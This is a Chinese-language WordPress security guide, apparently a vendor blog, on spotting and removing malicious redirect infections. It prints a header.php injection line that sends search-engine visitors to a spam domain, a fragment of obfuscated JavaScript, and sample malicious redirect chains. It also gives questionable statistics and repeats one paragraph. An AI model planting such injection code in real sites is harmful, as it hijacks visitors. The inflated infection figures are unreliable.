让我们来深入了解一下2024年WordPress网站安全的重要性。WordPress支持超过46%的网站,大约有6400万个网站,这使得它成为黑客的主要目标。每个月,有超过4亿人访问WordPress网站,这导致今年WordPress黑客攻击事件上升。
当前状况
根据Sucuri的数据,WordPress的恶意软件感染率在2020年至2021年间从83%上升到90%。快进到2024年,Fenotion报告说,超过60%的WordPress网站受到感染,通常会将用户重定向到恶意网站。这一趋势表明,WordPress用户越来越容易受到此类恶意软件的攻击。
您受影响了吗?
如果您的WordPress网站正在重定向到另一个网站,您就是重定向攻击的受害者。别担心,我们会帮助您解决这个问题。本文将指导您如何解决网站的恶意重定向问题。
步骤指南
让我们开始一个更新的逐步指南,清理WordPress网站上的恶意重定向。(我们还附上了视频和信息图,以便更容易理解!)
需要紧急帮助?
了解这种类型的攻击对于清理您的网站和防止其再次发生至关重要。如果您时间紧迫,我们可以帮助您修复被黑的WordPress网站并删除任何恶意软件。
常见问题
我们经常听到用户询问以下问题:
- 为什么我的网站被重定向到垃圾网站?
- 为什么我的WordPress网站被重定向到另一个网站?
- 我该如何阻止我的网站重定向到另一个网站?
- 如果这些问题在您心中,那么这篇文章就是您的一站式解决方案!
如果您的WordPress网站正在重定向到垃圾网站,别担心——很多人都在问为什么他们的网站会重定向到其他网站或多个网站。简单的答案是,您的WordPress网站可能已经被黑客攻击,并感染了恶意软件,这些恶意软件会将访客重定向到垃圾或网络钓鱼网站。如果想深入了解WordPress钓鱼,请查看我们相关的帖子。
如果这些问题在您心中,那么这篇文章就是您的一站式解决方案!
如果您的WordPress网站正在重定向到垃圾网站,别担心——很多人都在问为什么他们的网站会重定向到其他网站或多个网站。简单的答案是,您的WordPress网站可能已经被黑客攻击,并感染了恶意软件,这些恶意软件会将访客重定向到垃圾或网络钓鱼网站。如果想深入了解WordPress钓鱼,请查看我们相关的帖子。
为什么会发生这种情况
恶意重定向通常是为了黑帽SEO策略或获取广告展示量。黑客利用您WordPress网站的漏洞,采用后门或隐藏在源代码中的恶意脚本。有时,当您尝试访问wp-admin区域时,可能还会看到404错误。
可能导致此问题的原因
这些重定向可能是由于:
- 感染的WordPress插件
- 注入到.header.php、.footer.php或.htaccess文件中的恶意软件
我们处理过很多WordPress网站重定向到其他网站的案例,并成功修复了这些问题。
对您业务的负面影响
网站被攻击可能会以多种方式损害您的业务:
- 经济损失:黑客可以从您的网站窃取资金、数据和机密信息。如果您的网站重定向到网络钓鱼或恶意网站,请做好应对后果的准备。
- SEO损失:谷歌不会冒任何风险,您可能会受到惩罚,甚至可能被列入黑名单。您的网站在搜索结果中可能会出现“此网站可能被黑客攻击”的警告。
- 托管问题:您的托管服务提供商可能会暂停您的网站。您可能会收到“此网站已被暂停”或“帐户被暂停——请联系您的托管提供商以获取更多信息”的消息。
- 隐私泄露:如果访客无意中从感染的网站下载有害软件,可能会导致数据丢失和用户隐私问题。
- 品牌损害:如果访客被重定向到销售非法或垃圾产品的网站,可能会严重损害您的品牌,导致客户对您的电子商务网站失去信任。
- 收入损失:如果您使用WooCommerce销售产品,被黑客攻击可能会导致巨大的收入损失以及敏感信息被盗。
什么是WordPress恶意软件重定向黑客?
你有没有发现你的网站被重定向到另一个恶意网站?这就是所谓的“WordPress恶意软件重定向”或“WordPress重定向黑客攻击”。
这是一种恶意软件或漏洞,会让你被感染的网站将访客重定向到有害网站、网络钓鱼页面或其他恶意网站。这通常是因为一些恶意代码被注入到了你的WordPress数据库中,导致你的网站被重定向到其他地方。
WordPress被黑客植入恶意代码导致重定向的迹象和症状
你通常可以通过观察这些迹象和症状来判断你的WordPress网站是否感染了重定向恶意代码:
- 你的网站是否正在发生从当前网站重定向到另一个网站?
- 当你尝试登录仪表板时,WP-admin是否显示404错误?
- 你是否无法访问网站的仪表板或前端?
- 你是否无法登录网站的管理员区域?
- 在登录wp-admin时是否看到“ERROR: There is no user registered with that email address”的错误?
- 你的.htaccess文件中是否有意外的新代码?
- 你的index.php文件中是否有不熟悉的JavaScript?
- 你的网站在Google搜索结果中是否出现垃圾信息?
- 服务器中是否有意外的文件,名称奇怪或无意义?
下一步该怎么做
如果你发现了这些症状,尽快与我们联系!我们会对你的网站进行全面分析,找到黑客的所在位置,并开始清除过程。
WordPress被植入恶意代码导致重定向的类型
通常,当访问者被重定向到他们请求的页面以外的其他页面时,就会发现恶意的WordPress被黑客重定向。黑客通常使用特定的恶意代码将用户重定向到色情或欺诈网站,这会严重损害你的站点。以下是他们常用的一些手段:
- 1. 在你网站上的黑客将自己添加一个隐藏的管理员账户。
- 2. 在你的WordPress网站中注入或上传恶意代码.
- 3. 执行.php代码。
黑客通常将他们的恶意脚本伪装成看起来像是WordPress核心文件的合法文件。他们可以在多个位置放置有害代码,包括wp-content/plugins或wp-content/uploads文件夹、.htaccess、wp-includes、wp-content/themes或wp-config.php文件中。
WordPress网站中被植入恶意代码的实例
WordPress重定向黑客的例子
你可能会开始注意到很多WordPress网站重定向到恶意感染的域名,比如ibuyiiittraffic[.com]和i.cuttttraffic[.com]。这种重定向通常伴随WP-admin页面上的404错误。黑客通过后门黑客攻击或通过SQL注入或CSS注入恶意JavaScript来实现这种重定向。这是恶意重定向“链”的经典例子,网站在最终到达攻击者选择的域名之前会多次重定向。
有时,这些重定向发生在你点击页面的任何地方或点击“允许”时。
当前现状
如果你在网上搜索,你可以找到许多这种黑客攻击实际案例的例子。例如,一个网站可能会从clicks.fenotions[.com]重定向到wwwx.55680affic[.com],然后再重定向到red.goabcdforward[.com],依此类推,最终到达目标网站。
基于位置的重定向
在某些情况下,被重定向的域名会根据用户的位置进行自定义。如果你来自另一个国家,恶意页面可能会翻译成你的母语。
恶意代码示例
- JavaScript重定向:恶意脚本可以隐藏在小部件中,通过将模糊的JavaScript附加到文件中。黑客可能会将几行JavaScript添加到网站的多个文件中,使其难以发现,因为通常是模糊化的。
- 示例:
var_0xaae55=["","\x7A\x7F\x74\x7E","\x62\x75\x66\x75\x62\x63\x75","\x63\x60\x7C\x79\x64","\x3E\x...
3. 插件漏洞(XSS):WordPress插件中的存储跨站脚本(XSS)漏洞允许黑客注入恶意JavaScript。流行的插件如联系表单7和Elementor Pro已成为目标。
4. Header.php注入:黑客可能会在WordPress网站的header.php文件中插入几行恶意代码。这段代码通常用于跟踪返回访客或重定向他们。

5. 示例代码:
echo '<script>var s = document.referrer;if (s.indexOf("google") > 0 || s.indexOf("bing") > 0) { self.location = \'http://6dd****cccx**80sale.com/\';}</script>';
6. .htaccess和wp-config.php中的恶意代码:攻击者经常在.htaccess文件中隐藏他们的脚本,使其看起来是合法的。他们还可以在其他核心WordPress文件中伪装代码。
7. 添加隐藏的管理员:一旦黑客获得访问权限,他们可以将自己添加为管理员,从而完全控制网站并将其重定向到有害的域名。
8. 针对InternetExplorer用户的虚假更新:使用Internet Explorer可能会导致虚假的Java和Flash更新,这些更新会下载恶意软件。
9. 示例重定向链:
default6.com -> advertif5sementexample.com -> maintaginpc.soft2unhpdate.xyz -> intva31.saturnglibrary.info
这些重定向可能会将用户引导到推送虚假软件更新和其他恶意软件的网站。
如何检测并修复WordPress被植入恶意代码导致重定向第一步:将您的网站下线在开始解决恶意重定向问题之前,最好暂时将您的网站下线。这样可以在不让用户访问被黑页面的情况下,有足够的时间来处理问题。
第二步:备份一切在对任何核心文件进行更改之前,务必备份您的WordPress数据库。备份应包含被黑页面,以防您意外删除重要内容。保留您正在处理的所有文件的副本。
第三步:必要时寻求专业帮助如果您对JavaScript、CMS或PHP文件不太熟悉,最好咨询专业人士来处理此问题。
如何找到WordPress中的恶意代码
恶意软件可能隐藏在您的网站的多个区域。虽然逐页扫描可能会让人觉得不知所措,但攻击者通常会针对特定位置。您需要FTP/FTPS登录凭据来访问这些地方:
核心WordPress文件
index.php
index.html
.htaccess文件
主题文件
header.php
footer.php
functions.php
查找adminer脚本:名为“adminer.php”的文件检查wp_users表:确保没有未知或未经授权的用户。
查找.js和.json文件注意:在对任何文件进行更改之前,务必备份WordPress数据库!
清理恶意重定向的五步流程
1. 运行恶意软件扫描
确保在扫描之前备份完整网站。
使用尖端的WordPress漏洞和恶意软件扫描器。
2. 使用在线扫描器
Unmask Parasites:检查您的网站是否被黑。
Norton Safe Web:快速识别威胁。
VirusTotal:扫描常见病毒和恶意脚本。
Web Inspector:分析后门和重定向代码。
3. 查找恶意代码
检查index.php、index.html、header.php和footer.php中是否有可疑代码。
在文件中查找关键词如“eval”或“eval base64_decode”。
4. 更新配置
在wp-config.php文件中添加以下行,以防止通过wp-admin进行直接编辑:
define('DISALLOW_FILE_EDIT',true);
更新您的主题和插件到最新版本。
5. 更改所有密码
更改WordPress管理员密码以及任何相关帐户(FTP、数据库、托管)。
使用Google搜索控制台进行诊断
您可以运行测试以检查是否存在恶意软件。可以使用Google的URL检查工具(URL Inspection)(以前称为Fetch as Google)来分析您的网站。
删除恶意代码和页面
识别并删除导致重定向的恶意脚本。使用Google搜索控制台的URL移除功能清除搜索引擎结果中的恶意页面。

提交恶意代码复审请求
清理网站后,通过Google搜索控制台请求复审:
1. 登录Google搜索控制台。
2. 验证网站所有权。
3. 转到网站 > 仪表盘 > 安全问题。
4. 列出被怀疑感染的URL,一旦您的网站无恶意软件,单击“请求复审”,并详细说明您所采取的措施。

如何防止WordPress网站上的恶意重定向问题
为了确保您的WordPress网站安全性,要做到防范于未然,避免未来发生被黑客植入恶意代码导致重定向到其他垃圾网站的恶意黑客攻击行为,可以遵循以下指导原则:
1. 保持核心文件更新始终确保您的WordPress核心文件是最新的。定期更新有助于修补漏洞。
2. 更新安全密钥定期更新您的安全密钥。通过生成WordPress盐以提高安全性。
3. 选择可靠的托管服务选择一个安全的WordPress托管服务,该服务不仅仅是托管,还能积极管理您的网站。
4. 检查插件和主题定期审查您的插件和主题。确保它们由开发者进行更新。如果一段时间没有更新,考虑寻找替代方案。
5. 删除不活跃的主题和插件删除任何未使用的主题或插件。它们可能成为黑客入侵的潜在入口。
6. 避免使用破解主题和插件永远不要安装破解或盗版的主题/插件。它们通常带有隐藏的恶意软件。
7. 限制管理员账户保留一到两个管理员账户。将多余的管理员用户降级为作者或编辑角色。
8. 检查推送通知定期检查Chrome的推送通知,以确保没有可疑内容。
9. 运行杀毒扫描在您的计算机上运行全面的杀毒扫描,以捕捉任何潜在威胁。
10. 清理浏览器缓存和历史定期清理浏览器的缓存和历史,以删除任何潜在的恶意数据。
11. 使用分开的账户进行转售托管如果您使用转售托管账户,请避免将网站作为附加项添加到您的主账户下。将这些网站设置为单独的账户。
12. 删除开发配置确保从您的WordPress安装中删除所有开发/演示配置,尤其是那些位于公共目录之外的配置。
总结
WordPress支持全球超过46%的网站,这使其成为黑客的主要目标。如果您发现网站被重定向到垃圾网站,这意味着它可能感染了恶意软件。及时更新核心文件、插件和主题,使用可靠的托管服务,并定期扫描恶意软件,是确保网站安全的关键措施。如果遇到问题,可以参考本文的逐步指南或寻求专业帮助。确保网站安全不仅能保护您的业务,还能维护品牌形象和客户信任。